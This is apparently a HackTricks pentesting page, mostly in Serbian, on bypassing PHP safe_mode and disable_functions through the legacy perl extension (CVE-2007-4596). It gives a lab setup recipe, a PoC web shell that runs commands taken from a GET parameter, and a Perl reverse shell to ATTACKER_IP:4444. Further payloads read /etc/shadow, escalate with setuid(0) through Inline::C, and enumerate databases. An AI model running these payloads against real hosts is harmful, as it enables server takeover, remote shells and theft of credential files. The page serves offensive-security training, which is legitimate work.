PHP Perl Extension Safe_mode Bypass Exploit

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Pozadina

Problem praćen kao CVE-2007-4596 potiče iz zastarele PHP ekstenzije perl, koja u sebi uključuje kompletan Perl interpreter i ne poštuje PHP-ove kontrole safe_mode, disable_functions ili open_basedir. Bilo koji PHP worker koji učita extension=perl.so dobija neograničen Perl eval, pa je izvršavanje komandi trivijalno čak i kada su sve klasične PHP funkcije za pokretanje procesa blokirane. Iako je safe_mode uklonjen u PHP 5.4, mnogi zastareli shared-hosting stackovi i ranjivi labovi i dalje ga sadrže, pa je ovaj bypass i dalje koristan kada dospeš na legacy kontrolne panele.

Building a Testable Environment in 2025

  • Poslednja javno objavljena verzija (perl-1.0.1, January 2013) cilja PHP ≥5.0. Fetch it from PECL, compile it for the exact PHP branch you plan to attack, and load it globally (php.ini) or via dl() (if permitted).
  • Brz recept za Debian-based lab:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • Tokom eksploatacije potvrdite dostupnost sa var_dump(extension_loaded('perl')); ili print_r(get_loaded_extensions());. Ako nije prisutan, potražite perl.so ili zloupotrebite zapisljive php.ini/.user.ini unose da biste ga prisilno učitali.
  • Pošto interpreter živi unutar PHP workera, nisu potrebni spoljašnji binarni fajlovi — filteri za izlazni saobraćaj ili proc_open crne liste nemaju uticaja.

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still handy to confirm the extension responds to eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

Moderna poboljšanja payload-a

1. Puna TTY preko TCP

Ugrađeni interpreter može učitati IO::Socket čak i ako je /usr/bin/perl blokiran:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. File-System Escape čak i uz open_basedir

Perl ignoriše PHP-ov open_basedir, pa možete čitati proizvoljne fajlove:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

Prosledite izlaz preko IO::Socket::INET ili Net::HTTP da biste eksfiltrirali podatke bez diranja u deskriptore kojima PHP upravlja.

3. Inline kompajliranje za eskalaciju privilegija

Ako Inline::C postoji na nivou sistema, kompajlirajte pomoćne module unutar zahteva bez oslanjanja na PHP-ov ffi ili pcntl:

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

Smatrajte Perl kao LOLBAS toolkit—npr. izvucite MySQL DSN-ove čak i ako mysqli nedostaje:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

Reference

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks